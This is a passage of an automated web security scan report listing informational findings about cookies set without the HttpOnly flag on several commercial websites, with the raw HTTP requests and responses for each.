Set-Cookie: SEARCHKEYWORD=credit%20monitoring;path=/
Set-Cookie: AFSCHANNEL=3788747813;path=/
Date: Sun, 24 Apr 2011 19:56:39 GMT
Content-Length: 50298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...

18.480. http://www.identityguard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=wzgnjd2knxvl1445vt0zjeet; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

18.481. http://www.identityguard.com/gscc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /gscc.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gscc.aspx?mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: URLParams=mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; cmTPSet=Y; CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.1.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615498489

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20039
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=njkcpvmavkvinriptaaozg45; path=/; HttpOnly
Set-Cookie: URLParams=id=78725&LangType=1033&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1; path=/
Date: Sun, 24 Apr 2011 03:10:16 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link rel="SHORTC
...[SNIP]...

18.482. http://www.infusionblog.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:37:12 GMT
Expires: Mon, 25 Apr 2011 01:42:22 GMT
Pragma: public
Connection: Keep-Alive
Set-Cookie: X-Mapping-glbfbjch=6C1FE170452DF50DF4E2477FF60172A1; path=/
Last-Modified: Mon, 25 Apr 2011 00:42:22 GMT
Content-Length: 38973

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

18.483. http://www.infusionsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; ISFunnel=ms; __v1192_vexclude=false; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.1.10.1303693620; __v1192_=46276302; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630
If-Modified-Since: Mon, 25 Apr 2011 01:06:42 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:37:00 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:37:00 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 30605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir
...[SNIP]...

18.484. http://www.infusionsoft.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /about

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:06 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:25:46 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:06 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...

18.485. http://www.infusionsoft.com/clients  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /clients

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clients HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:40:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:27:08 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:40:27 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:40:29 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31589


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...

18.486. http://www.infusionsoft.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /demo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /demo HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.1.10.1303693620; __v1192_=46276302; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:37:00 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:37:00 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 42382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...

18.487. http://www.infusionsoft.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /pricing

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pricing HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:20 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:19 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:20 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 29858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...

18.488. http://www.krypt.com/active/captcha.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /active/captcha.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /active/captcha.html?id=81bcc5596ecaa5f0f24c1589a925e557 HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://www.krypt.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cid=9b766d29f4a59d55b1ee0c2aaaa06184; __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.3.10.1303662879

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:17 GMT; path=/; domain=.krypt.com
Content-Length: 1650
Content-Type: image/jpeg

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

18.489. http://www.krypt.com/active/cart/cart-image.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /active/cart/cart-image.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /active/cart/cart-image.html HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://www.krypt.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cid=9b766d29f4a59d55b1ee0c2aaaa06184; __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.3.10.1303662879

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:05 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:11 GMT; path=/; domain=.krypt.com
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Length: 1051
Content-Type: image/png

.PNG
.
...IHDR...............'n....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

18.490. http://www.krypt.com/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /contact/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:02 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 27890

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Contact
...[SNIP]...

18.491. http://www.krypt.com/solutions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /solutions/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /solutions/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:03 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 20343

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Solution
...[SNIP]...

18.492. http://www.krypt.com/why-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /why-us/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:04 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 22985

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - The Kryp
...[SNIP]...

18.493. http://www.krypt.com/why-us/datacenters/lax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/datacenters/lax/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /why-us/datacenters/lax/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
